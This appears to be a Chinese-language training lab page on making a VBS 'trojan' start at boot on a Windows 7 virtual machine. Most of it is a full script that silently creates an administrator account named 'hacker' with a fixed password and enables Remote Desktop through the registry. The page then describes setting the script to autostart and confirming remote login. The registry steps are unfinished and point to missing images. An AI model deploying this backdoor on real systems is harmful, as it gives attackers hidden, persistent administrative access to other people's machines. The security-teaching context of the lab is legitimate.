实现木马开机自启动_图片附件中有,待更新……

 

实验名称: 实现木马开机自启动

 

 

 

实验环境

在一台安装了Windows 7的虚拟机上,实现VBS木马程序的开机自启动。

需求描述

需求描述:

Ø  编写VBS木马程序。

Ø  VBS木马程序能够开机自启动。

推荐步骤

1.         Windows 7系统中,将下面的命令粘贴到记事本程序中,然后将其保存为名为Config.vbs的文件。

dim wshell

set wshell=createobject("wscript.shell")

wshell.run "cmd /c net user hacker benet /add" ,vbhide 

wshell.run "cmd /c net localgroup administrators hacker /add" ,vbhide 

wshell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",0,"REG_DWORD"  

set wshell=nothing

wscript.quit

 

 

2.         使用编辑注册表的方式使其能够开机自启动。

    首先要记住config.vbs脚本的存储路径,请看下图

然后依次打开注册表项……

 

3.         验证结果。重新启动计算机后,通过“远程桌面连接”程序可以使用木马程序创建的用户名和密码连接到该计算机。

 

拓扑环境

 

 

 

 

 

 

 

你可能感兴趣的:(实现木马开机自启动)